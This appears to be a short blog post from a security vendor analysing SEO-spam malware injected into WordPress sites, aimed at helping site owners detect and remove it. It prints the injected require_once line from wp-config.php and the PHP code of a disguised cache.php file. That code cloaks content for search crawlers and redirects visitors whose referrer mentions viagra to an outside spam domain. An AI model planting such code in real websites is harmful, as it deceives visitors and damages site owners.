It seems that SPAM is all the rave these days, wonder why, could it be because it’s a multi-million business?
In any event, detecting is always a challenge as is remediating. This is what it might look like if you use our free scanner to scan the website:
Besides some of the obvious things we have started seeing tactics used on Joomla sites on WordPress ones. They are using things like this:
@require_once(ABSPATH . ‘/wp-includes/Text/cache.php’);
You’ll find this in your wp-config.php file more often than not. If you follow the cookie trail you’ll find that the cache.php contains code like this:
<?php
$uniq_ua_string=@$_SERVER[‘HTTP_USER_AGENT’];
$uniq_ref=@$_SERVER[“HTTP_REFERER”];
$is_human=1;
if (stristr($uniq_ua_string,”googlebot”))$is_human=0;
if (stristr($uniq_ua_string,”bing”))$is_human=0;
if (stristr($uniq_ua_string,”yahoo”))$is_human=0;
if(@$is_human == 0 && preg_match(‘/^\/(?:index\.(?:php|html?))?$/’, @$_SERVER[‘REQUEST_URI’])) {
@readfile(dirname(__FILE__).”/css.php”);
exit;
}
if(preg_match(‘/viagra/i’, $uniq_ref) > 0) {header(“Location: http://vaptk.com/in.php?t=v&s=1”);exit;}
?>
If you follow the trail further and go to the css.php file you’ll find all kinds of goodies that will be of particular interest:
What can I say, sometimes it’s all about following the cookie trail.
When removing be sure to remove the @require_once and the payload as well. The good news is if you’re running our plugin you’ll quickly identify an integrity issue in wp-includes and wp-config that will allow you to quickly act to rectify the issue. Because of the time of injection we’d venture to say that the vector is likely compromised credentials to the server, likely via FTP.
Leave a reply
